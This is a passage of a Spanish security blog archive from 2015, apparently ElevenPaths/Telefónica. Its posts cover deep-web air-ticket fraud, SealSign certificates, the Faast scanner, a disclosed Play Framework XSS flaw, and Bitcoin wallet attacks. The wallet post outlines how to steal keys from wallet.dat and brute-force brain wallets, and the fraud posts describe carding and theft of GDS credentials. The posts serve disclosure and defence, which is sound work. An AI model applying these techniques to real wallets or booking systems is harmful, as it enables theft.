existe mucha oferta de documentación falsa (incluso a precios asequibles) la inmensa mayoría de esta documentación difícilmente pasaría un control fronterizo, ya que si no se trata de malas imitaciones, es documentación real perdida o robada a sus propietarios Esta documentación suele estar registrada en bases de datos policiales como la STLD (Stolen and Lost Travel Documents) de la Interpol. Venta de identidades falsas en la Deep Web Existe también bastante oferta de documentación falsa "de calidad", cuando no realmente auténtica de determinados países, aunque sus precios son demasiado altos (hasta 20.000 dólares). Esto hace que se utilice para otra clase de actividades ilícitas y no precisamente viajes. Quien puede portar esta clase de documentación falsa tiene otras actividades ilegales bastante más lucrativas que le permite comprar billetes auténticos. ¿Y la policía no hace nada? ¿Y los bancos? Durante mucho tiempo ha estado bastante extendida la creencia de que las fuerzas de seguridad, en sus actuaciones cibernéticas, no se dedican a la persecución de este pequeño fraude, y que principalmente se centran en la persecución de delitos de pornografía infantil y similares. Su argumento es que al estar involucrados distintos países y el fraude ser relativamente pequeño (de forma individual) no se persigue. Por lo general el viajero es de un país, la compra del billete se produce en una agencia de viajes de un país diferente. Además, el pago se hace con una tarjeta de crédito robada de un tercer territorio. Para colmo, el país origen/destino del viaje es quizás diferente a los anteriores. Al haber tantas jurisdicciones involucradas, es muy complicado realizar su persecución legal, más allá de cancelar la compra si es detectada a tiempo. Y el caso es que esto era así hasta hace no mucho tiempo. Sin embargo en el último año y medio se han realizado ya hasta tres grandes redadas a escala mundial de forma coordinada entre Interpol, Europol y otras fuerzas de seguridad de otros países, junto a bancos y aerolíneas, en las que se ha detenido a cientos de viajeros. Y todo parece indicar que estas redadas globales continuarán. Cómo protegerse de este fraude El fraude en viajes afecta sobre todo a bancos y agencias de viajes, y en menor medida a las aerolíneas. Desde los servicios de Vigilancia Digital de Telefónica intentamos detectar en qué lugares de la Deep Web se está produciendo esta venta ilegal para conocer en detalle cuáles son los sistemas empleados para el fraude. La lucha contra este fraude, al igual que contra el fraude en general, pasa por intentar reducir el robo de medios de pago (o dejarlos sin utilidad en caso de ser robados) y, sobre todo, identificar al titular de cada transacción correctamente. * Cómo funciona el fraude de los billetes de avión y reserva de hoteles (I) Marcos Monge marcos.monge@cybersecurity.telefonica.com
8 de junio de 2015
Cómo funciona el fraude de los billetes de avión y reserva de hoteles (I)
Perpetrar un fraude relacionado con billetes de avión u hoteles y salir airoso, no parece buena idea. Durante todo el proceso se está identificado, y sería trivial para las autoridades detener a los autores. Pero... nada más lejos de la realidad. Existe un floreciente mercadeo de fraude en viajes en el mundo underground. Cada vez más personas consiguen viajar un 30%-50% por debajo del precio real (incluso alguno, gratis). Y lo que es más sorprendente, aunque se trate de un fraude, la gente viaja con sus identidades reales. ¿Cuál es el secreto? Para los aficionados a la seguridad informática, las dos posibilidades de fraude más conocidas serían: El "carding" (uso de tarjetas de crédito robadas) El uso de puntos/millas robados de cuentas atacadas (reward points) Y lo cierto es que, según una estimación basada en una investigación reciente realizada por Eleven Paths y el Servicio de Detección de Amenazas y Vigilancia Digital de Telefónica, alrededor del 70% del fraude en viajes tiene como origen una de esas dos técnicas. El resto de viajes robados, vienen cada uno de diferentes fuentes, dependiendo de las habilidades de cada "vendedor" o proveedor de los viajes. Dado que el carding es fácil de detectar (con servicios como JetSetMe, o de detección de tarjetas robadas con plataformas como BlueLiv), la industria del fraude en viajes ha buscado otros métodos "más" seguros. En la investigación llevada a cabo se han identificado distintos métodos "más sofisticados", como los ataques directos a las agencias de viaje (tanto online como offline) y sus sistemas de backend conectados a los sistemas GDS (Global Distribution System) de las aerolíneas y hoteles (como AMADEUS o SABRE), robando las credenciales de acceso de esas agencias. También se han identificado ataques a cuentas corporativas de grandes empresas que manejan una gran cantidad de viajes, entre los que se introducen puntualmente los fraudulentos de forma que pasen desapercibidos, o fraudes a los seguros... y otros muchos más variopintos, pero no masivos. ¿Vendedores? ¿Es que hay vendedores de viajes robados? Como todo en Internet, esto se ha convertido en un negocio, y las mafias se han encargado de hacerlo floreciente. Han creado una gran oferta en los mercados negros de la Deep Web. El objetivo final de las mafias es monetizar el método usado para conseguir los viajes (ya sea carding, o el robo de credenciales de sistemas GDS... ) y sobre todo, traspasar el riesgo. Quien se arriesga es el que viaja, nunca el vendedor (proveedor) de viajes, que permanece en el anonimato usando toda clase de medidas de protección para no ser localizado. A su vez, muchos de los compradores que acuden a la Deep Web revenden los billetes a gente de la calle. Traspasan el riesgo y evitan ser pillados. Billete de viaje a mitad de precio vendido en la Deep Web También existe un gran número de vendedores con varios años de antigüedad "en el negocio", retirados de las ofertas públicas de los Black Markets. Estos suelen trabajar solo con compradores de forma directa, que adquieren un gran volumen de viajes y que les proporcionan un flujo constante de nuevos viajeros. ¿Y cómo es de grande el fraude? Se han localizado más de 40 vendedores distintos en activo, donde alguno de ellos dice gestionar picos de hasta 100 viajes al día. Los vendedores, salvo unos pocos que se mantienen estables (entre 15 y 20), van y vienen. Todas las semanas aparecen nuevos vendedores y desaparecen otros. Algunos estafando a sus "clientes"… Obviamente, nada suele ser lo que parece en la deep web. Si tenemos en cuenta las estimaciones de Interpol y Europol, junto a las aerolíneas, el fraude asciende hasta los 1.000 millones de dólares, y afecta (de forma proporcional a su tamaño) a todas las aerolíneas y bancos emisores de tarjetas de crédito. Datos del fraude con robo de billetes Para hacerse una idea de la magnitud del fraude, pueden usarse los resultados de las redadas de Interpol y Europol, de las que se han realizado tres grandes operaciones en el último año y medio. Consisten en cazar viajeros que consuman este tipo de billetes comprados u obtenidos de manera ilícita. Durante los aproximadamente dos días que dura cada redada, se detectan o detienen a unos 150-250 viajeros. Realizando una media de forma extremadamente conservadora, se puede extrapolar que el fraude asciende a unos 100-200 viajeros diarios a nivel mundial. El dato probablemente sea mucho mayor, puesto que las redadas se centraron en el fraude ya descubierto (principalmente realizado con carding, y por tanto "detectable" cotejando los billetes comprados con tarjetas que se saben robadas). Es lógico pensar que hay mucho fraude no descubierto (a tiempo). En la siguiente entrada, veremos si cualquiera puede comprar estos billetes, cuánto cuestan, cómo usan su identidad real y cómo protegerse. * Cómo funciona el fraude de los billetes de avión y reserva de hoteles (y II) Marcos Monge marcos.monge@cybersecurity.telefonica.com
3 de junio de 2015
Firma digital de documentos con SealSign (III)
En un artículo anterior vimos los distintos productos de SealSign e indicamos que se basaban en la firma digital, la cual puede utilizar tanto biometría como certificados digitales. En este artículo vamos a analizar el uso de los certificados digitales en los productos de SealSign. Esquema simple de firma digital Certificados digitales Un certificado digital es básicamente un documento electrónico que asocia una identidad (de un usuario, una empresa, un servidor, etcétera) con una clave pública. Además dicha asociación está garantizada por una entidad de confianza (llamada Autoridad de Certificación) que en España son principalmente la Fábrica Nacional de Moneda y Timbre y la Dirección General de Policía. En algunos aspectos es muy similar al DNI. El DNI es un documento en el que aparece la identidad de un usuario, una firma manuscrita que le identifica y tiene un periodo de validez. En el certificado digital aparecen también la identidad de una entidad (usuario, empresa, servidor, etcétera), en lugar de la firma manuscrita aparece la clave pública, y también tiene una caducidad. Comparación entre un DNI y un certificado digital Hay varios tipos de certificados, pero todos tienen unos atributos (información privada asociada: nombre, email, etcétera) que permiten asociar una identidad a una clave pública. Introducción al módulo CKC (Central Key Control) de SealSign En una empresa cada empleado puede utilizar uno o varios certificados para identificarse en Internet al realizar ciertas operaciones que requieren su identificación. Cada uno de esos certificados se almacena en su propio equipo. Uno de los problemas más habituales en cualquier organización, es la ineficiente gestión de los certificados y claves usados para la firma de documentos, sobre todo cuando estas gestiones se hacen de forma masiva por varios miembros de la misma compañía. Piénsese en la cantidad de certificados que puede haber en una empresa modesta, de digamos unos 500 empleados. Uso de certificados por los empleados al realizar operaciones en Internet CKC proporciona un almacén de certificados y claves asociados a unas reglas de uso configurables. Este almacén puede utilizar certificados guardados en diversos repositorios y gestionarlos como si estuviesen almacenados localmente en cada equipo. De esta forma las acciones que realiza son transparentes al usuario. Además solo permite a los usuarios autorizados que realicen los procesos de autenticación, firma o cifrado. CKC tiene una parte servidora que es donde se sitúa el almacén de certificados, y una parte cliente que es la que utilizan los usuarios para acceder a esos certificados. Certificados de los usuarios almacenados en un servidor CKC Además, CKC tiene la posibilidad de aumentar la seguridad en el acceso a los certificados, añadiendo un factor extra de autenticación a la hora del uso de la clave privada de los mismos. Esta adición se basa en la integración con SmartID (otro producto de ElevenPaths), de modo que se pueden añadir factores tales como tarjetas inteligentes (con o sin contacto) o huellas dactilares. También permite configurar tanto una lista de procesos, de equipos cliente, o de usuarios autorizados como una lista de URLs en las que se permitirá el uso de las claves privadas asociadas a los certificados de la plataforma. El módulo dispone de una consola de administración basada en web, que es la misma que la utilizada con otros productos de SealSign, de cara a una mayor integración entre los módulos. El módulo CKC dentro de SealSign Características de CKC Una vez que un entorno empresarial dispone del módulo CKC deberá haber un administrador que se encargue de gestionar el módulo. Antes de que un certificado pueda ser usado o compartido a través de CKC, ese administrador deberá añadir el certificado o su referencia en el servidor de SealSign DSS. Los certificados se pueden autoimportar al servidor de una forma transparente al usuario, además los usuarios avanzados o "power users" pueden importar al servidor sus propios certificados. El módulo DSS es el módulo sobre el que descansa el funcionamiento de CKC. De hecho para su correcto funcionamiento necesita además los módulos DSS Web y DSS Service de SealSign. (En el primer post de esta serie se indican los módulos existentes). Módulos de SealSign para CKC Opcionalmente esos certificados se pueden guardar en servidores, bases de datos cifradas o dispositivos criptográficos. También es posible utilizar diversos tipos de autenticaciones respecto a los usuarios, como por ejemplo usuarios internos del servidor o autenticación con Active Directory. Posible entorno empresarial con un módulo CKC Una vez que los certificados se han añadido al almacén de CKC ya están disponibles para su uso, aunque hay que tener en cuenta cada certificado tiene un único propietario. El uso de CKC permite establecer distintos usos a cada certificado mediante un conjunto de condiciones de acceso. Estas condiciones incluyen diversas combinaciones de elementos de una organización. Entre estos elementos se pueden citar por ejemplo a usuarios autorizados, equipos o dispositivos desde los que se permite el acceso, aplicaciones autorizadas, URLs autorizadas (solo en Internet Explorer), etcétera. Será el administrador de CKC el que establezca estas condiciones. Esto hace posible que, por ejemplo, solo desde ciertos equipos se pueda acceder a determinados certificados, lo que añade un nivel extra de seguridad al uso de estos. Es posible también generar y exportar automáticamente informes con las acciones realizadas por CKC, ya que DSS Service incluye un módulo de auditoría e informes integrado que registra cualquier uso de los certificados digitales almacenados. Casos de uso con y sin CKC En caso de disponer de un certificado importante: Supongamos que la empresa SUAN con 50.000 empleados, dispone de un certificado extraordinariamente importante con el cual se pueden realizar acciones de alto nivel (transacciones bancarias, compras y ventas de activos, etcétera). Ese certificado solo está disponible para los cinco consejeros delegados de SUAN. Sin CKC: En este caso cada uno de los cinco consejeros delegados deberá disponer en su equipo de una copia de dicho certificado. El hecho de que existan cinco copias del mismo certificado supone un riesgo excesivo en caso de pérdida del equipo o suplantación del consejero por parte de un intruso. A la hora de actuar cada uno de los consejeros delegados utilizaría su certificado para realizar las acciones necesarias en Internet. Entorno empresarial de SUAN sin el uso del módulo CKC Con CKC: En este caso el certificado se almacena de forma segura en un servidor de CKC y cada uno de los cinco consejeros delegados podrá acceder a él, s iempre y cuando cumplan las normas de seguridad establecidas en dicho servidor (acceso a determinados usuarios, acceso desde ciertas aplicaciones, etcétera). A la hora de actuar, cada uno de los consejeros delegados se identificaría en el servidor en el que estuviera CKC, y tras obtener el certificado realizaría las acciones necesarias en Internet. Entorno empresarial de SUAN sin el uso del módulo CKC En caso de necesitar delegar el certificado: Supongamos que la empresa ANSU con 500 empleados, tiene un único jefe con un certificado importante con el cual realiza todas las transacciones de la empresa. El jefe se tiene que ausentar un mes por determinados motivos y durante ese tiempo hay que realizar una tarea que requiere el uso de ese certificado. Sin CKC: En este caso el jefe debería confiar en uno de sus subalternos para que usase el certificado en su ausencia para realizar dicha tarea. Esto no impediría a dicho empleado su uso para realizar cualquier transacción cuyas consecuencias podrían ser imprevisibles para la empresa. Con CKC: En este caso el jefe podría indicar a uno de sus subalternos que usase el certificado en su ausencia para realizar dicha tarea, pero podría establecer previamente que lo utilizase únicamente en un momento dado, siendo denegada invalidada cualquier acción realizada con dicho certificado en otro momento. En un próximo artículo se mostrarán casos de uso en los que se pueden utilizar los certificados digitales y la biometría. * Firma digital de documentos con SealSign (I) * Firma digital de documentos con SealSign (II)
27 de mayo de 2015
Faast, módulos y plugins
Faast dispone de múltiples módulos o "plugins" que se encargan de realizar una o varias comprobaciones para adaptarnos a nuevos medios (sistemas, páginas o frameworks) o con el fin de añadir rápidamente pruebas específicas para vulnerabilidades conocidas. Así, hemos creado de forma rápida plugins para Heartbleed, Shellshock, FREAK, MS15-034, etc... Aprovechando el sistema modular, se ha implementado un sistema similar para reutilizar todas las peticiones web que realiza Faast hacia los activos de la organización y analizar esas respuestas. Esto permite retroalimentar la auditoría de forma continua, tal y como realiza un pentester profesional. Comentemos algunos de estos módulos. Crawling: Mapa de activos y fugas de información Es el encargado de la esencial parte de Crawling para completar el mapa de activos. Gracias a la infraestructura de Faast, no solo permite capturar enlaces, sino además correos electrónicos ubicados en cualquier archivo público, completándose con otras vías de obtención de correos electrónicos como pueden ser la búsqueda en directorios PGP o la recolección de metadatos gracias a Metashield. Ejemplos de correos extraídos por Faast Tras la aparición del módulo de Crawling, se han ido añadiendo módulos "complementarios". Por ejemplo el de fugas de información. Las fugas de información pueden referirse tanto a los datos personales como a los característicos errores de programación PHP o de configuración del servidor que permiten al atacante conocer mejor la infraestructura y preparar mejor otros ataques posteriores. Este sistema de módulos se vuelve muy versátil cuando se combinan los módulos entre sí. Por ejemplo, para provocar fugas en este sentido, se utilizan distintas técnicas como: realizar conversiones de tipo en las variables la cadena de consulta (query string), inyecciones a motores de base de datos o simplemente introducir caracteres especiales en la petición. Estas acciones pueden provocar un comportamiento inesperado en las aplicaciones web con fugas de información. Ejemplo de reporte de fuga de información Reinterpretación de las fugas Ante las fugas de información es necesario interpretar y comprenderlas para mejorar el escaneo. Por ejemplo, en los errores de PHP podemos destacar la recuperación del usuario en los errores de autenticación de SQL. También podríamos destacar el error que el servidor muestra cuando el código del desarrollador intentar acceder a una variable que no ha sido asignada. Por defecto será null y esta excepción se mostrará en la web de esta forma: Ejemplo de vulnerabilidad con la variable URL sin definir Esta variable es capturada y reportada como dentro de la URL tanto en la cadena de consulta (query string) para que posteriormente el resto de módulos de Faast realicen las pruebas pertinentes sobre ella. Siguiendo con el esquema de análisis del contenido de los archivos que procesa Faast, cabe destacar la detección de las fugas de código fuente. Como se comentó en post anteriores sobre la subida de repositorios de código a entornos de producción, es habitual que el servidor no este configurado adecuadamente o se realicen copias de seguridad de archivos. Estas acciones provocan que la plataforma no detecte los archivos como archivos interpretables (como es el caso de PHP) y este código quede accesible. Fuga de información en el código fuente La detección de fugas de información se complementa con la detección de servidores que están en modo depuración. Este módulo se encarga de detectar configuraciones que solo deberían estar presentes en entornos de desarrollo y que no deberían usarse en entornos de producción reportando una recomendación cuando se detecta esta configuración. Dependiendo de la plataforma, esta recomendación puede ser más o menos crítica. Podríamos citar el caso del framework Laravel, que en caso de tener los errores habilitados puede ofrecer mucha información sobre el código. Y no sólo con el HTML o peticiones web Aprovechando la estructura modular, en Faast no nos hemos limitado a los módulos que analizan las peticiones HTML, sino que también se evalúan los archivos binarios. En el caso de ficheros ejecutables se valora si están o no firmados digitalmente. Recomendación sobre archivos ejecutables no firmados En el caso de ficheros comprimidos, Faast no solo es capaz de detectar copias de seguridad de carpetas y archivos basándose en el original, sino que de forma transparente, estos son evaluados en busca de código fuente o de archivos relevantes. Se reportan para que el cliente evalué si esos ficheros son legítimos o realmente suponen un riesgo para la organización. Módulos para recursos externos Cargar recursos de forma externa puede suponer una vía de ataque para los atacantes. Un ejemplo es el ataque que sufrió la RSA Conference sufriendo una "desfiguración" por cargar una librería externa de JavaScript. Al hacerlo, se delega el control a un tercero. Faast reporta los enlaces a imágenes, librerías JavaScript u hojas de estilo CSS que se deleguen a otras organizaciones. Teniendo en cuenta la política CORS, también se valoran los enlaces que no cumplan esta política. Dependiendo de la configuración del navegador del cliente, puede que muestre la web incorrectamente. Por ejemplo, cargar elementos por HTTP cuando se navega a través de HTTPS provocaría una alerta en el navegador. Y no solo eso, Faast reporta vulnerabilidades o recomendaciones valorando la configuración de las cabeceras que implementa el servidor, como por ejemplo la ausencia de la cabecera X-Robots-Tags en el caso del fichero Robots.txt para evitar su indexación, la ausencia de las cabeceras Content Security Policy, o la ausencia de la cabecera X-FRAME-OPTIONS para evitar posibles ataques de clickjacking. Además de, como añadido, malas configuraciones en cabeceras como podrían ser el desactivar la protección contra XSS de los navegadores con la cabecera XSSProtection o ser muy permisivo con la configuración CORS con la cabecera Same-Origin Policy. Óscar Sánchez oscar.sanchez@11paths.com
18 de mayo de 2015
ElevenPaths finds a XSS problem in Play Framework
Play Framework is defined as "The high velocity Web Framemork for Java and Scala". We use it internally in some of our products. Ricardo Martín from our QA team has found a (could be permanent) XSS that has now been solved by the official team. This XSS could make all the platforms based on Play Framework, more prone to phishing attacks or able to steal data from users. When Play framework had a problem with the URL parameter. When it parses the view, it translates it to an URL that will work as a GET reques t. If the parameter value starts with ":", some exception is launched and fails to escape the value: @{Controller.action(URLparameterWithInjection)} How to get the URL parameter: How to get the URL parameter where the XSS may be encoded Then, URL goes through the program. Example of XSS injection encoded: Result of the injected URL, encoded (which is Ok) But once we "inject" the ":" character... Result of the injected URL, not encoded (which is a problem) There is a condition that does not allow to encode the injection. In fact, the code in Play Framework made it clear: There is an specific condition that does not encode strings beginning with ":" Whenever the view is interpreted, when translating to an URL that will work as a GET request, we may use it as a parameter to print it as a result. We developed a PoC and sent it to developers. Versions 1.2.7 to 1.3.0 have been tested to be vulnerable. Just a week after making them aware of the problem, this alert has been released, that solves the problem: https://www.playframework.com/security/vulnerability/20150506-XssUrlParamerter.
11 de mayo de 2015
El nuevo árbol de metadatos de Faast
La interfaz de Faast evoluciona a medida que clientes y usuarios nos ofrecen feedback, realizan comentarios o nos piden alguna funcionalidad concreta. Este sistema nos permite estar siempre al día con las necesidades de nuestros clientes para ofrecer una interfaz mucho más cómoda y preparada para afrontar las tareas que se le piden. Esta vez se ha rediseñado tanto estética como funcionalmente la visualización de metadatos encontrados en un escaneo de Faast. El estilo se ha cambiado para que se parezca en estructura al usado en la FOCA. Ahora aporta dos posibles formas de visualizar los datos, ambas presentadas simultáneamente al acceder a la pestaña "Metadatos" en la sección de resultados de cualquier escaneo. Vista doble de metadatos La información se presenta en forma de árbol (tanto en un modo de visualización como en el otro), agilizando la navegación y mejorando la experiencia del usuario. Pensamos que así se puede mantener una visión global en todo momento de dónde se encuentra dentro de la complicada maraña en la que pueden llegar a convertirse los metadatos encontrados en los documentos de una web. Con el objetivo de mejorar también la experiencia de usuario, se ha separado la visualización de metadatos en dos partes: por el tipo de metadato y el mapa de red. Por tipo de metadato Vista por metadatos La idea es simple y bastante similar a como estaba organizado antes de este cambio: Se ve de forma rápida y cómoda qué tipos de metadatos se han encontrado y qué cantidad. En el caso de la figura se han encontrado 13 usuarios, 9 programas diferentes y 3 rutas internas. Al desplegar el tipo de metadato que nos interesa, se nos presenta un listado de los diferentes metadatos encontrados. En nuestro ejemplo hay 3 rutas internas: /home/Raphael Mutten/Pictures c:documents and settingsDonny c:usersLeo Mutten Finalmente si queremos ver dónde se ha encontrado el metadato, desplegamos el elemento en cuestión para ver el documento donde se encontró el metadato. Una vez más en nuestro ejemplo podemos ver que "c:usersLeo Mutten" se ha encontrado en un documento pdf en nuestro dominio. Por máquina La segunda forma de visualizar estos metadatos viene inspirada por la FOCA y crea un mapa de la red local basándose únicamente en los metadatos encontrados. Vista por mapa de red Aquí podemos ver todas las máquinas con su sistema operativo (en caso de ser conocido) de un simple vistazo. Nos permite imaginar rápidamente parte del dimensionado de la red. Además se dispone de un menú desplegable para cada máquina encontrada, en la que a su vez se pueden ver los metadatos que se han extraído de ella, también categorizada por tipo. De ahí finalmente, el menú en árbol nos lleva al archivo de donde se ha obtenido la información. Juan Luis Sanz juanluis.sanz@11paths.com
6 de mayo de 2015
Hay alguien ahí fuera: protege tu cartera de bitcoins
Las pérdidas ocasionadas a las plataformas que operan con criptodivisas reflejan un interés creciente de los ciberdelincuentes hacia estos medios de pago. El éxito de estos ciberataques pone de manifiesto que las medidas de seguridad implementadas no siempre son proporcionales al valor de los activos que protegen. Vamos a ver qué tipo de carteras virtuales existen, y cuáles son sus medidas de seguridad. Varios tipos de carteras En el caso de Bitcoin, las eWallets son las herramientas que nos permiten realizar transacciones y acreditar ante la red la propiedad de los bitcoins utilizando un esquema criptográfico de clave pública para firmarlas (actualmente, ECDSA). En función de cómo se generen el par de direcciones y claves privadas, nos encontraremos ante diferentes tipos de carteras. Las "carteras random" crean el par de claves a partir de un número pseudoaleatorio. Este proceso proporciona seguridad a la cartera al dificultar la generación de claves privadas asociadas a direcciones ya creadas. El inconveniente de esta aproximación es que impediría hacer uso de estos bitcoins en el supuesto de perder el fichero que contiene la clave privada, bien porque el soporte físico se encuentre dañado o porque perdamos las credenciales de acceso. En el caso de las "carteras vanity", el usuario introduce el patrón que las direcciones creadas aleatoriamente deben satisfacer. Pese a que el tiempo de generación aumenta considerablemente, este procedimiento es utilizado por algunos servicios para conseguir direcciones más amigables y fáciles de identificar. Por tener una referencia, tardaríamos alrededor de diez minutos en encontrar una dirección con el patrón 1eleven usando un equipo de sobremesa. Las "carteras mentales" generan la dirección y la clave privada a partir de una palabra conocida. Aunque su utilización no requiere un almacenamiento de claves porque estas podrían generarse en el momento de necesitarlas, cualquiera podría hacerlo si conociera que el input utilizado es, por ejemplo, ElevenPathsTelefonica. Dirección de Bitcoin y clave privada asociada a la cartera generada con la palabra ElevenPathsTelefonica. Dada la irreversibilidad de las transacciones de Bitcoin, podría darse el supuesto de que los propietarios de una misma cartera no llegaran a un acuerdo para retirar el dinero y fuera necesaria la intervención de un tercero confiable que ejerciera de árbitro. Por ello, las carteras multifirma, a diferencia de las anteriores, no están asociadas a una clave privada sino a un número determinado de direcciones que autorice las transacciones, lo que además aportan una seguridad adicional ante posibles transferencias ilegítimas. ¿Ataques a carteras en local? Una vez escogido el tipo de cartera en el que depositar bitcoins, se pueden llevar a cabo diferentes aproximaciones para vulnerar los distintos sistemas de almacenamiento de claves. Para las carteras en local, cuyas claves son almacenadas en archivos bajo control del usuario, el primer paso sería identificar equipos que tengan corriendo nodos de Bitcoin, por ejemplo, en el puerto 8333. Ejemplo de búsqueda de equipos que tienen corriendo un nodo de Bitcoin. En el caso de que se consiguiera acceso a alguno de estos equipos, el siguiente paso sería identificar la ubicación del fichero de la cartera (wallet.dat, en el caso del cliente bitcoin-qt) y, en el supuesto de que el fichero no se encontrara protegido, se podrían exportar las claves privadas y efectuar transacciones hacia direcciones controladas por el atacante. Si, por el contrario, este fichero se encontrara cifrado, el atacante debería optar por realizar ataques dirigidos de fuerza bruta o de diccionario o bien capturar las contraseñas utilizando técnicas de keylogging cuando esta vaya a ser utilizada. Otro tipo de amenaza contra este sistema es el denominado ataque por aislamiento. Un atacante que controlara la forma en la que la víctima se conecta a la red tendría la capacidad de servirle transacciones fraudulentas modificando, por ejemplo, la configuración del archivo peers.dat, en el caso de bitcoin-qt. ¿Ataques a carteras mentales? En el caso de las carteras mentales, uno de los vectores de ataque consistiría en la creación de diccionarios para generar de forma automática posibles direcciones y sus respectivas claves privadas. De esta manera, todas aquellas direcciones que contuvieran monedas podrían ser sustraídas ya que el atacante contaría con la clave privada que firmaría las transacciones. Para confirmar la viabilidad de este ataque y estimar qué cantidad de monedas habría estado expuesta, realizamos un experimento en el que se generaron las claves privadas y direcciones de más de cuatro millones de palabras diferentes presentes en 200 diccionarios genéricos en distintos idiomas. De los cuatro millones de direcciones generadas, pudimos observar que 17.902 direcciones realizaron operaciones y que en dichas cuentas llegaron a depositarse aproximadamente 19 bitcoins. Representación temporal de las cantidades sustraídas en dólares y en bitcoins. Una vez conocida la facilidad de monitorizarlas, el siguiente paso fue preguntarnos si de verdad había alguien dedicado a sustraer bitcoins que se depositasen en carteras mentales. Para ello, generamos tres direcciones que no habían recibido transacciones hasta la fecha a partir de palabras conocidas. Tras transferirles pequeñas cantidades de dinero, solamente tuvimos que esperar diez segundos hasta confirmar que alguien estaba operando con las dos primeras direcciones. Pero, ¿qué ocurrió con la tercera dirección? A diferencia de las dos primeras en las que solamente se realizó un intento de transacción, desde la tercera dirección se solicitaron hasta tres intentos de transacción simultáneos hacia tres cuentas diferentes. Para entender cómo la red resuelve este tipo de conflictos, es necesario comprender cómo son añadidas las transacciones a la cadena de bloques. Los bloques son conjuntos de transacciones que se añaden cada 10 minutos aproximadamente. El criterio de selección de quién añadirá un nuevo bloque se realiza a partir de la resolución de un problema matemático de dificultad ajustable. En este caso, Bitcoin opta por el cómputo de un hash cuya complejidad varía en función de la capacidad de cómputo total de la red. Será el nodo que añada el bloque el que recolecte las comisiones de las transacciones incluidas y una cantidad de BTC determinada por la cesión de su capacidad de cómputo. Aunque los criterios de adición son configurables, la propuesta más aceptada se basa en dos premisas: comisiones y prioridad. Las comisiones son cantidades elegidas por los usuarios para favorecer que su transacción sea añadida más rápidamente. Por su parte, la prioridad de añadir una transacción viene determinada por el volumen (BTC_i, en Satoshis) y antigüedad (Age_i, en número de confirmaciones) de las cantidades transferidas y el tamaño de la operación (s_t, en bytes). En el ejemplo que llevamos a cabo, tres direcciones con características diferentes reclamaron nuestro dinero. La primera sin comisión, la segunda con una pequeña comisión y la tercera incluía la transacción como parte de una transacción mayor en la que se transferían dos inputs diferentes hacia otra cuenta, la cantidad que nosotros transferimos y cerca de 75 BTC. Cinco horas después, la red aceptó la transacción dirigida hacia esta última dirección. La cuestión es: ¿qué habría pasado si un tercero hubiera confiado en alguna de las otras transacciones antes de esas cinco horas? En ese caso, se habría incurrido en un fenómeno de triple gasto y cualquier operación derivada de estas no habría tenido efecto real alguno. ¿Ataques a carteras en la nube? Por último, nos encontramos con las carteras en la nube. Desde finales de 2013 y principios de 2014, hemos podido comprobar que, a partir de la información cedida por la compañía Blueliv, cuando el precio del Bitcoin se encontraba en su punto más alto de cotización se intensificó el robo de credenciales de plataformas de Bitcoin. La realidad es que si las plataformas no tienen implementadas sistemas de autenticación robustos tanto para el acceso como para la emisión de transacciones, la información procedente de una botnet destinada al robo de credenciales podría ser más que suficiente para sustraer el dinero de las cuentas. Recomendaciones Después de analizar diferentes ataques a las carteras, no es recomendable la generación de claves privadas a partir de carteras mentales, ni la utilización de plataformas que no dispongan de sistemas de verificación en dos pasos como Latch. En cambio, y a pesar de que solamente se utilicen actualmente en el 1% de las transacciones, las carteras multifirma son las más aconsejables desde el punto de vista de la seguridad. Además de los ataques específicos que se pudieran perpetrar contra el funcionamiento teórico de las criptodivisas, los atacantes podrán replicar los métodos utilizados contra el sector bancario adecuando la funcionalidad de familias de malware como ZeuS e intensificando las campañas de phishing para el robo de criptodivisas. Por ello, las empresas de seguridad pueden encontrar en el mundo de las criptodivisas un nuevo target al que destinar sus productos basados en la detección de campañas de phishing, malware o aplicaciones móviles sospechosas. En este último aspecto, herramientas de investigación como Tacyt serán útiles para la identificación de abusos contra los usuarios de aplicaciones en dispositivos móviles. Asimismo, a medida que estas monedas vayan consolidándose como medios de pago, serán necesarios productos destinados a la reducción de tiempos de espera con el fin de evitar transacciones potencialmente fraudulentas y al ofrecimiento de servicios de arbitraje para la resolución de conflictos aprovechando las posibilidades de las carteras multifirma. * El contenido de este artículo hace referencia a la ponencia titulada How I met your eWallet presentada en RootedCON 2015 cuya presentación junto con más información se encuentra disponible en: http://es.slideshare.net/mobile/elevenpaths/how-i-met-your-ewallet-rooted-2015
29 de abril de 2015
"Tienes más posibilidades de que te alcance un rayo, que de que se infecte tu móvil". ¿De verdad?
Usar titulares con gancho para llamar la atención sobre un estudio... se ha hecho siempre, hay que permitir y entender que se tomen ciertas licencias. Pero cada vez la atención es más escasa porque el número de integrantes de una industria crece, el potencial cliente se "inmuniza" y es necesario elevar el listón... Este titular de Damballa sobre un estudio de malware en telefonía móvil suena bien, pero ¿qué hay de cierto si leemos la letra pequeña, los comparamos con otros, o incluso simplemente razonamos un poco? El estudio Del estudio destacan este titular, como claro reclamo para que los periodistas lo perpetúen: Investigación sobre el 50% de los móviles estadounidenses concluye que tienes 1.3 más posibilidades de ser alcanzado por un rayo que de tener malware en tu dispositivo de comunicación Damballa ha realizado un estudio bastante interesante. Para evaluar los niveles de infección en móviles, no se basa en firmas (evitando todos los conocidos problemas tanto técnicos como de interpretación que surgen cuando se utilizan firmas antivirus). Disponen de DNS pasivos (o lo que es lo mismo, la capacidad de saber qué dominios resuelve un teléfono) del 50% del tráfico móvil de Estados Unidos. Entendemos que porque tienen acceso a los DNS del operador dominante, lo que ya puede suponer una desvirtualización del estudio (¿sabemos si el operador elegido define de alguna forma al tipo de usuario?) Así que, en la RSA han aprovechado para presentar su segundo estudio (el primero fue en 2012) con la siguiente metodología: En el estudio realizado durante el último cuatrimestre de 2014, vieron entre 160 y 130 millones de dispositivos por día. Estos dispositivos contactaron con 2.762.453 host únicos. Solo 9.688 de 151 millones de dispositivos contactaron con una lista negra de hosts. De ahí se deduce que el 0,0064% de móviles están infectados. Puesto que el National Weather Services dice que las posibilidades de ser alcanzado por un rayo son de 0,01%, el titular está servido. ¿Qué base tienen esos números? No es difícil saber por dónde empezar: nadie tiene la verdad absoluta. Este tipo de datos, como en las encuestas, pueden cocinarse más o menos. Aunque desde el espíritu crítico, se pueden intentar señalar los potenciales puntos débiles del estudio y que pueden hacer (cuando menos) variar ostensiblemente los números. Incluso no es difícil encontrar otras investigaciones con resultados muy dispares. Pero si nos centramos en los potenciales puntos débiles del estudio, pueden esconderse en varios aspectos. En el método y en la cantidad No dan muchos más detalles sobre la metodología. En principio, es un método más interesante que el de las firmas antivirus. Elude los conocidos problemas de calidad de detección, de uso de motores, de interpretación, etc. y va directo al grano de la 